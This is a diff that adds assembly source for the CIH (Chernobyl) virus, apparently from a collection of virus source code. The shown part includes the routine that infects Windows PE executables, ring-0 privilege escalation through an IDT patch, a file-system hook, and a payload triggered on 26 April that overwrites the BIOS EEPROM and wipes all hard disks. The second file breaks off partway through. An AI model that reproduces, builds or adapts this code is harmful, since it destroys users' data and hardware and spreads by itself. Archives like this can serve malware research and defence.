* +; *************************** +; * Is the File * +; * Already Infected !? * +; *************************** + + ; cmp [esi], '\0PE\0' + cmp dword ptr [esi], 00455000h + jne CloseFile + +; ************************************* +; * The File is ^o^ * +; * PE(Portable Executable) indeed. * +; ************************************* +; * The File isn't also Infected. * +; ************************************* + +; ************************************* +; * Start to Infect the File * +; ************************************* +; * Registers Use Status Now : * +; * * +; * EAX = 04h * +; * EBX = File Handle * +; * ECX = 04h * +; * EDX = 'PE\0\0' Signature of * +; * ImageFileHeader Pointer's * +; * Former Byte. * +; * ESI = DataBuffer Address ==> @8 * +; * EDI = IFSMgr_Ring0_FileIO Address * +; * EBP = D600h ==> Read Data in File * +; ************************************* +; * Stack Dump : * +; * * +; * ESP => ------------------------- * +; * | EFLAG(CF=0) | * +; * ------------------------- * +; * | FileNameBufferPointer | * +; * ------------------------- * +; * | EDI | * +; * ------------------------- * +; * | ESI | * +; * ------------------------- * +; * | EBP | * +; * ------------------------- * +; * | ESP | * +; * ------------------------- * +; * | EBX | * +; * ------------------------- * +; * | EDX | * +; * ------------------------- * +; * | ECX | * +; * ------------------------- * +; * | EAX | * +; * ------------------------- * +; * | Return Address | * +; * ------------------------- * +; ************************************* + + push ebx ; Save File Handle + + push 00h ; Set VirusCodeSectionTableEndMark + +; *************************** +; * Let's Set the * +; * Virus' Infected Mark * +; *************************** + + push 01h ; Size + push edx ; Pointer of File + push edi ; Address of Buffer + +; *************************** +; * Save ESP Register * +; *************************** + + mov dr1, esp + +; *************************** +; * Let's Set the * +; * 
NewAddressOfEntryPoint * +; * ( Only First Set Size ) * +; *************************** + + push eax ; Size + +; *************************** +; * Let's Read * +; * Image Header in File * +; *************************** + + mov eax, ebp + mov cl, SizeOfImageHeaderToRead + add edx, 07h ; Move EDX to NumberOfSections + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Let's Set the * +; * NewAddressOfEntryPoint * +; * ( Set Pointer of File, * +; * Address of Buffer ) * +; *************************** + + lea eax, (AddressOfEntryPoint-@8)[edx] + push eax ; Pointer of File + + lea eax, (NewAddressOfEntryPoint-@8)[esi] + push eax ; Address of Buffer + +; *************************** +; * Move EDX to the Start * +; * of SectionTable in File * +; *************************** + + movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] + lea edx, [eax+edx+12h] + +; *************************** +; * Let's Get * +; * Total Size of Sections * +; *************************** + + mov al, SizeOfScetionTable + + ; I Assume NumberOfSections <= 0ffh + mov cl, (NumberOfSections-@8)[esi] + + mul cl + +; *************************** +; * Let's Set Section Table * +; *************************** + + ; Move ESI to the Start of SectionTable + lea esi, (StartOfSectionTable-@8)[esi] + + push eax ; Size + push edx ; Pointer of File + push esi ; Address of Buffer + +; *************************** +; * The Code Size of Merge * +; * Virus Code Section and * +; * Total Size of Virus * +; * Code Section Table Must * +; * be Small or Equal the * +; * Unused Space Size of * +; * Following Section Table * +; *************************** + + inc ecx + push ecx ; Save NumberOfSections+1 + + shl ecx, 03h + push ecx ; Save TotalSizeOfVirusCodeSectionTable + + add ecx, eax + add ecx, edx + + sub ecx, (SizeOfHeaders-@9)[esi] + not ecx + inc ecx + + cmp cx, small CodeSizeOfMergeVirusCodeSection + jl short OnlySetInfectedMark + +; *************************** +; * Save Original * +; * Address of 
Entry Point * +; *************************** + + ; Save My Virus First Section Code + ; Size of Following Section Table... + ; ( Not Include the Size of Virus Code Section Table ) + push ecx + + xchg ecx, eax ; ECX = Size of Section Table + + mov eax, (AddressOfEntryPoint-@9)[esi] + add eax, (ImageBase-@9)[esi] + mov (OriginalAddressOfEntryPoint-@9)[esi], eax + +; *************************** +; * Read All Section Tables * +; *************************** + + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Let's Set Total Virus * +; * Code Section Table * +; *************************** + + ; EBX = My Virus First Section Code + ; Size of Following Section Table + pop ebx + pop edi ; EDI = TotalSizeOfVirusCodeSectionTable + pop ecx ; ECX = NumberOfSections+1 + + push edi ; Size + + add edx, eax + push edx ; Pointer of File + + add eax, esi + + ; Modify the Bug that WinZip Self-Extractor Occurs Error... + ; So When Open WinZip Self-Extractor, My Virus Don't Infect it... 
+ ; The WinZip Self-Extractor Last Section Name is '_winzip_' + ; I Just Only Test Last Four Bytes ==> 'zip_' + cmp dword ptr [eax-SizeOfScetionTable+04h], '_piz' + je OnlySetInfectedMark + + push eax ; Address of Buffer + +; *************************** +; * Set the First Virus * +; * Code Section Size in * +; * VirusCodeSectionTable * +; *************************** + + lea eax, [eax+edi-04h] + mov [eax], ebx + +; *************************** +; * Let's Set My Virus * +; * First Section Code * +; *************************** + + push ebx ; Size + + add edx, edi + push edx ; Pointer of File + + lea edi, (MyVirusStart-@9)[esi] + push edi ; Address of Buffer + +; *************************** +; * Let's Modify the * +; * AddressOfEntryPoint to * +; * My Virus Entry Point * +; *************************** + + mov (NewAddressOfEntryPoint-@9)[esi], edx + +; *************************** +; * Setup Initial Data * +; *************************** + + lea edx, [esi-SizeOfScetionTable] + mov ebp, offset VirusSize + + jmp StartToWriteCodeToSections + +; *************************** +; * Write Code to Sections * +; *************************** + +LoopOfWriteCodeToSections: + + add edx, SizeOfScetionTable + + mov ebx, (SizeOfRawData-@9)[edx] + sub ebx, (VirtualSize-@9)[edx] + jbe EndOfWriteCodeToSections + + push ebx ; Size + + sub eax, 08h + mov [eax], ebx + + mov ebx, (PointerToRawData-@9)[edx] + add ebx, (VirtualSize-@9)[edx] + push ebx ; Pointer of File + + push edi ; Address of Buffer + + mov ebx, (VirtualSize-@9)[edx] + add ebx, (VirtualAddress-@9)[edx] + add ebx, (ImageBase-@9)[esi] + mov [eax+4], ebx + + mov ebx, [eax] + add (VirtualSize-@9)[edx], ebx + + ; Section contains initialized data ==> 00000040h + ; Section can be Read. 
==> 40000000h + or (Characteristics-@9)[edx], 40000040h + +StartToWriteCodeToSections: + + sub ebp, ebx + jbe SetVirusCodeSectionTableEndMark + + add edi, ebx ; Move Address of Buffer + +EndOfWriteCodeToSections: + + loop LoopOfWriteCodeToSections + +; *************************** +; * Only Set Infected Mark * +; *************************** + +OnlySetInfectedMark: + mov esp, dr1 + + jmp WriteVirusCodeToFile + +; *************************** +; * Set Virus Code * +; * Section Table End Mark * +; *************************** + +SetVirusCodeSectionTableEndMark: + + ; Adjust Size of Virus Section Code to Correct Value + add [eax], ebp + add [esp+08h], ebp + + ; Set End Mark + xor ebx, ebx + mov [eax-04h], ebx + +; *************************** +; * When VirusGame Calls * +; * VxDCall, VMM Modifies * +; * the 'int 20h' and the * +; * 'Service Identifier' * +; * to 'Call [XXXXXXXX]'. * +; *************************** +; * Before Writing My Virus * +; * to File, I Must Restore * +; * them First. ^__^ * +; *************************** + + lea eax, (LastVxDCallAddress-2-@9)[esi] + + mov cl, VxDCallTableSize + +LoopOfRestoreVxDCallID: + mov word ptr [eax], 20cdh + + mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] + mov [eax+2], edx + + movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] + sub eax, edx + + loop LoopOfRestoreVxDCallID + +; *************************** +; * Let's Write * +; * Virus Code to the File * +; *************************** + +WriteVirusCodeToFile: + mov eax, dr1 + mov ebx, [eax+10h] + mov edi, [eax] + +LoopOfWriteVirusCodeToFile: + + pop ecx + jecxz SetFileModificationMark + + mov esi, ecx + mov eax, 0d601h + pop edx + pop ecx + + call edi ; VXDCall IFSMgr_Ring0_FileIO + + jmp LoopOfWriteVirusCodeToFile + +; *************************** +; * Let's Set CF = 1 ==> * +; * Need to Restore File * +; * Modification Time * +; *************************** + +SetFileModificationMark: + pop ebx + pop eax + + stc ; Enable CF(Carry Flag) + pushf + +; 
************************************* +; * Close File * +; ************************************* + +CloseFile: + xor eax, eax + mov ah, 0d7h + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Need to Restore File Modification * +; * Time !? * +; ************************************* + + popf + pop esi + jnc IsKillComputer + +; ************************************* +; * Restore File Modification Time * +; ************************************* + + mov ebx, edi + + mov ax, 4303h + mov ecx, (FileModificationTime-@7)[esi] + mov edi, (FileModificationTime+2-@7)[esi] + call ebx ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Disable OnBusy * +; ************************************* + +DisableOnBusy: + dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy + +; ************************************* +; * Call Previous FileSystemApiHook * +; ************************************* + +prevhook: + popad + + mov eax, dr0 ; + jmp [eax] ; Jump to prevhook + +; ************************************* +; * Call the Function that the IFS * +; * Manager Would Normally Call to * +; * Implement this Particular I/O * +; * Request. * +; ************************************* + +pIFSFunc: + mov ebx, esp + push dword ptr [ebx+20h+04h+14h] ; Push pioreq + call [ebx+20h+04h] ; Call pIFSFunc + pop ecx ; + + mov [ebx+1ch], eax ; Modify EAX Value in Stack + +; *************************** +; * After Calling pIFSFunc, * +; * Get Some Data from the * +; * Returned pioreq. 
* +; *************************** + + cmp dword ptr [ebx+20h+04h+04h], 00000024h + jne QuitMyVirusFileSystemHook + +; ***************** +; * Get the File * +; * Modification * +; * Date and Time * +; * in DOS Format.* +; ***************** + + mov eax, [ecx+28h] + mov (FileModificationTime-@6)[esi], eax + +; *************************** +; * Quit My Virus' * +; * IFSMgr_FileSystemHook * +; *************************** + +QuitMyVirusFileSystemHook: + + popad + + ret + +; ************************************* +; * Kill Computer !? ... *^_^* * +; ************************************* + +IsKillComputer: + ; Get Now Month from BIOS CMOS + mov ax, 0708h + out 70h, al + in al, 71h + + xchg ah, al + + ; Get Now Day from BIOS CMOS + out 70h, al + in al, 71h + + xor ax, 0426h ; 04/26/???? + jne DisableOnBusy + +; ************************************** +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; * Kill Kill Kill Kill Kill Kill Kill * +; ************************************** + +; *************************** +; * Kill BIOS EEPROM * +; *************************** + + mov bp, 0cf8h + lea esi, IOForEEPROM-@7[esi] + +; *********************** +; * Show BIOS Page in * +; * 000E0000 - 000EFFFF * +; * ( 64 KB ) * +; *********************** + + mov edi, 8000384ch + mov dx, 0cfeh + cli + call esi + +; *********************** +; * 
Show BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + + mov di, 0058h + dec edx ; and al,0fh + mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h + call esi + +; *********************** +; * Show the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E01FF * +; * ( 512 Bytes ) * +; * , and the Section * +; * of Extra BIOS can * +; * be Writted... * +; *********************** + + lea ebx, EnableEEPROMToWrite-@10[esi] + + mov eax, 0e5555h + mov ecx, 0e2aaah + call ebx + mov byte ptr [eax], 60h + + push ecx + loop $ + +; *********************** +; * Kill the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E007F * +; * ( 80h Bytes ) * +; *********************** + + xor ah, ah + mov [eax], al + + xchg ecx, eax + loop $ + +; *********************** +; * Show and Enable the * +; * BIOS Main ROM Data * +; * 000E0000 - 000FFFFF * +; * ( 128 KB ) * +; * can be Writted... * +; *********************** + + mov eax, 0f5555h + pop ecx + mov ch, 0aah + call ebx + mov byte ptr [eax], 20h + + loop $ + +; *********************** +; * Kill the BIOS Main * +; * ROM Data in Memory * +; * 000FE000 - 000FE07F * +; * ( 80h Bytes ) * +; *********************** + + mov ah, 0e0h + mov [eax], al + +; *********************** +; * Hide BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + ; or al,10h + mov word ptr (BooleanCalculateCode-@10)[esi], 100ch + call esi + +; *************************** +; * Kill All HardDisk * +; *************************************************** +; * IOR Structure of IOS_SendCommand Needs * +; *************************************************** +; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * +; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? 
* +; *************************************************** + +KillHardDisk: + xor ebx, ebx + mov bh, FirstKillHardDiskNumber + push ebx + sub esp, 2ch + push 0c0001000h + mov bh, 08h + push ebx + push ecx + push ecx + push ecx + push 40000501h + inc ecx + push ecx + push ecx + + mov esi, esp + sub esp, 0ach + +LoopOfKillHardDisk: + int 20h + dd 00100004h ; VXDCall IOS_SendCommand + + cmp word ptr [esi+06h], 0017h + je KillNextDataSection + +ChangeNextHardDisk: + inc byte ptr [esi+4dh] + + jmp LoopOfKillHardDisk + +KillNextDataSection: + add dword ptr [esi+10h], ebx + mov byte ptr [esi+4dh], FirstKillHardDiskNumber + + jmp LoopOfKillHardDisk + +; *************************** +; * Enable EEPROM to Write * +; *************************** + +EnableEEPROMToWrite: + mov [eax], cl + mov [ecx], al + mov byte ptr [eax], 80h + mov [eax], cl + mov [ecx], al + + ret + +; *************************** +; * IO for EEPROM * +; *************************** + +IOForEEPROM: +@10 = IOForEEPROM + + xchg eax, edi + xchg edx, ebp + out dx, eax + + xchg eax, edi + xchg edx, ebp + in al, dx + +BooleanCalculateCode = $ + or al, 44h + + xchg eax, edi + xchg edx, ebp + out dx, eax + + xchg eax, edi + xchg edx, ebp + out dx, al + + ret + +; ********************************************************* +; * Static Data * +; ********************************************************* + +LastVxDCallAddress = IFSMgr_Ring0_FileIO +VxDCallAddressTable db 00h + db IFSMgr_RemoveFileSystemApiHook-_PageAllocate + db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook + db IFSMgr_Ring0_FileIO-UniToBCSPath + +VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h +VxDCallTableSize = ($-VxDCallIDTable)/04h + +; ********************************************************* +; * Virus Version Copyright * +; ********************************************************* + +VirusVersionCopyright db 'CIH v' + db MajorVirusVersion+'0' + db '.' 
+ db MinorVirusVersion+'0' + db ' TTIT' + +; ********************************************************* +; * Virus Size * +; ********************************************************* + +VirusSize = $ +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) + +; ********************************************************* +; * Dynamic Data * +; ********************************************************* + +VirusGameDataStartAddress = VirusSize +@6 = VirusGameDataStartAddress +OnBusy db 0 +FileModificationTime dd ? + +FileNameBuffer db FileNameBufferSize dup(?) +@7 = FileNameBuffer + +DataBuffer = $ +@8 = DataBuffer +NumberOfSections dw ? +TimeDateStamp dd ? +SymbolsPointer dd ? +NumberOfSymbols dd ? +SizeOfOptionalHeader dw ? +_Characteristics dw ? +Magic dw ? +LinkerVersion dw ? +SizeOfCode dd ? +SizeOfInitializedData dd ? +SizeOfUninitializedData dd ? +AddressOfEntryPoint dd ? +BaseOfCode dd ? +BaseOfData dd ? +ImageBase dd ? +@9 = $ +SectionAlignment dd ? +FileAlignment dd ? +OperatingSystemVersion dd ? +ImageVersion dd ? +SubsystemVersion dd ? +Reserved dd ? +SizeOfImage dd ? +SizeOfHeaders dd ? 
+SizeOfImageHeaderToRead = $-NumberOfSections + +NewAddressOfEntryPoint = DataBuffer ; DWORD +SizeOfImageHeaderToWrite = 04h + +StartOfSectionTable = @9 +SectionName = StartOfSectionTable ; QWORD +VirtualSize = StartOfSectionTable+08h ; DWORD +VirtualAddress = StartOfSectionTable+0ch ; DWORD +SizeOfRawData = StartOfSectionTable+10h ; DWORD +PointerToRawData = StartOfSectionTable+14h ; DWORD +PointerToRelocations = StartOfSectionTable+18h ; DWORD +PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD +NumberOfRelocations = StartOfSectionTable+20h ; WORD +NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD +Characteristics = StartOfSectionTable+24h ; DWORD +SizeOfScetionTable = Characteristics+04h-SectionName + +; ********************************************************* +; * Virus Total Need Memory * +; ********************************************************* + +VirusNeedBaseMemory = $ + +VirusTotalNeedMemory = @9 +; + NumberOfSections(??)*SizeOfScetionTable(28h) +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) + +; ********************************************************* +; ********************************************************* + +VirusGame ENDS + + END FileHeader \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.cih_14.asm b/MSDOS/Virus.MSDOS.Unknown.cih_14.asm new file mode 100644 index 00000000..d04e8f92 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cih_14.asm 
@@ -0,0 +1,1533 @@ +; **************************************************************************** +; * The Virus Program Information * +; **************************************************************************** +; * * +; * Designer : CIH Source : TTIT of TATUNG in Taiwan * +; * Create Date : 04/26/1998 Now Version : 1.4 * +; * Modification Time : 05/31/1998 * +; * * +; * Turbo Assembler Version 4.0 : tasm /m cih * +; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe * +; * * +; *==========================================================================* +; * Modification History * +; *==========================================================================* +; * v1.0 1. Create the Virus Program. * +; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * +; * 04/26/1998 3. Virus Code doesn't Reload into System. * +; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * +; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * +; * 6. When System Opens Existing PE File, the File will be * +; * Infected, and the File doesn't be Reinfected. * +; * 7. It is also Infected, even the File is Read-Only. * +; * 8. When the File is Infected, the Modification Date and Time * +; * of the File also don't be Changed. * +; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * +; * Previous FileSystemApiHook, it will Call the Function * +; * that the IFS Manager Would Normally Call to Implement * +; * this Particular I/O Request. * +; * 10. The Virus Size is only 656 Bytes. * +; *==========================================================================* +; * v1.1 1. Especially, the File that be Infected will not Increase * +; * it's Size... ^__^ * +; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * +; * When Exception Error Occurs, Our OS System should be in * +; * Windows NT. So My Cute Virus will not Continue to Run, * +; * it will Jmup to Original Application to Run. * +; * 3. Use Better Algorithm, Reduce Virus Code Size. 
* +; * 4. The Virus "Basic" Size is only 796 Bytes. * +; *==========================================================================* +; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * +; * 2. Modify the Bug of v1.1 * +; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * +; *==========================================================================* +; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. * +; * So When Open WinZip Self-Extractor ==> Don't Infect it. * +; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. * +; *==========================================================================* +; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. * +; * 2. Change the Date of Killing Computers. * +; * 05/31/1998 3. Modify Virus Version Copyright. * +; * 4. The Virus "Basic" Size is 1019 Bytes. * +; **************************************************************************** + + .586P + +; **************************************************************************** +; * Original PE Executable File(Don't Modify this Section) * +; **************************************************************************** + +OriginalAppEXE SEGMENT + +FileHeader: + db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h + db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h + db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh + db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h + db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h + db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh + db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh + db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h + db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 
00ah + db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h + db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h + db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h + db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 
000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + dd 00000000h, VirusSize + +OriginalAppEXE ENDS + +; **************************************************************************** +; * My Virus Game * +; **************************************************************************** + +; ********************************************************* +; * Constant Define * +; ********************************************************* + +TRUE = 1 +FALSE = 0 + +DEBUG = TRUE + +MajorVirusVersion = 1 +MinorVirusVersion = 4 + +VirusVersion = MajorVirusVersion*10h+MinorVirusVersion + + +IF DEBUG + + FirstKillHardDiskNumber = 81h + HookExceptionNumber = 05h + +ELSE + + FirstKillHardDiskNumber = 80h + HookExceptionNumber = 03h + +ENDIF + + +FileNameBufferSize = 7fh + +; ********************************************************* +; ********************************************************* + +VirusGame SEGMENT + + ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame + ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame + +; ********************************************************* +; * Ring3 Virus Game Initial Program * +; ********************************************************* + +MyVirusStart: + push ebp + +; ************************************* +; * Let's Modify Structured Exception * +; * Handing, Prevent Exception Error * +; * Occurrence, Especially in NT. 
* +; ************************************* + + lea eax, [esp-04h*2] + + xor ebx, ebx + xchg eax, fs:[ebx] + + call @0 +@0: + pop ebx + + lea ecx, StopToRunVirusCode-@0[ebx] + push ecx + + push eax + +; ************************************* +; * Let's Modify * +; * IDT(Interrupt Descriptor Table) * +; * to Get Ring0 Privilege... * +; ************************************* + + push eax ; + sidt [esp-02h] ; Get IDT Base Address + pop ebx ; + + add ebx, HookExceptionNumber*08h+04h ; ZF = 0 + + cli + + mov ebp, [ebx] ; Get Exception Base + mov bp, [ebx-04h] ; Entry Point + + lea esi, MyExceptionHook-@1[ecx] + + push esi + + mov [ebx-04h], si ; + shr esi, 16 ; Modify Exception + mov [ebx+02h], si ; Entry Point Address + + pop esi + +; ************************************* +; * Generate Exception to Get Ring0 * +; ************************************* + + int HookExceptionNumber ; GenerateException +ReturnAddressOfEndException = $ + +; ************************************* +; * Merge All Virus Code Section * +; ************************************* + + push esi + mov esi, eax + +LoopOfMergeAllVirusCodeSection: + + mov ecx, [eax-04h] + + rep movsb + + sub eax, 08h + + mov esi, [eax] + + or esi, esi + jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 + + jmp LoopOfMergeAllVirusCodeSection + +QuitLoopOfMergeAllVirusCodeSection: + + pop esi + +; ************************************* +; * Generate Exception Again * +; ************************************* + + int HookExceptionNumber ; GenerateException Again + +; ************************************* +; * Let's Restore * +; * Structured Exception Handing * +; ************************************* + +ReadyRestoreSE: + sti + + xor ebx, ebx + + jmp RestoreSE + +; ************************************* +; * When Exception Error Occurs, * +; * Our OS System should be in NT. * +; * So My Cute Virus will not * +; * Continue to Run, it Jmups to * +; * Original Application to Run. 
* +; ************************************* + +StopToRunVirusCode: +@1 = StopToRunVirusCode + + xor ebx, ebx + mov eax, fs:[ebx] + mov esp, [eax] + +RestoreSE: + pop dword ptr fs:[ebx] + pop eax + +; ************************************* +; * Return Original App to Execute * +; ************************************* + + pop ebp + + push 00401000h ; Push Original +OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack + + ret ; Return to Original App Entry Point + +; ********************************************************* +; * Ring0 Virus Game Initial Program * +; ********************************************************* + +MyExceptionHook: +@2 = MyExceptionHook + + jz InstallMyFileSystemApiHook + +; ************************************* +; * Do My Virus Exist in System !? * +; ************************************* + + mov ecx, dr0 + jecxz AllocateSystemMemoryPage + + add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException + +; ************************************* +; * Return to Ring3 Initial Program * +; ************************************* + +ExitRing0Init: + mov [ebx-04h], bp ; + shr ebp, 16 ; Restore Exception + mov [ebx+02h], bp ; + + iretd + +; ************************************* +; * Allocate SystemMemory Page to Use * +; ************************************* + +AllocateSystemMemoryPage: + + mov dr0, ebx ; Set the Mark of My Virus Exist in System + + push 00000000fh ; + push ecx ; + push 0ffffffffh ; + push ecx ; + push ecx ; + push ecx ; + push 000000001h ; + push 000000002h ; + int 20h ; VMMCALL _PageAllocate +_PageAllocate = $ ; + dd 00010053h ; Use EAX, ECX, EDX, and flags + add esp, 08h*04h + + xchg edi, eax ; EDI = SystemMemory Start Address + + lea eax, MyVirusStart-@2[esi] + + iretd ; Return to Ring3 Initial Program + +; ************************************* +; * Install My File System Api Hook * +; ************************************* + +InstallMyFileSystemApiHook: + + lea eax, FileSystemApiHook-@6[edi] + + push eax ; + int 20h ; 
VXDCALL IFSMgr_InstallFileSystemApiHook +IFSMgr_InstallFileSystemApiHook = $ ; + dd 00400067h ; Use EAX, ECX, EDX, and flags + + mov dr0, eax ; Save OldFileSystemApiHook Address + + pop eax ; EAX = FileSystemApiHook Address + + ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point + mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] + mov edx, [ecx] + mov OldInstallFileSystemApiHook-@3[eax], edx + + ; Modify IFSMgr_InstallFileSystemApiHook Entry Point + lea eax, InstallFileSystemApiHook-@3[eax] + mov [ecx], eax + + cli + + jmp ExitRing0Init + +; ********************************************************* +; * Code Size of Merge Virus Code Section * +; ********************************************************* + +CodeSizeOfMergeVirusCodeSection = offset $ + +; ********************************************************* +; * IFSMgr_InstallFileSystemApiHook * +; ********************************************************* + +InstallFileSystemApiHook: + push ebx + + call @4 ; +@4: ; + pop ebx ; mov ebx, offset FileSystemApiHook + add ebx, FileSystemApiHook-@4 ; + + push ebx + int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook +IFSMgr_RemoveFileSystemApiHook = $ + dd 00400068h ; Use EAX, ECX, EDX, and flags + pop eax + + ; Call Original 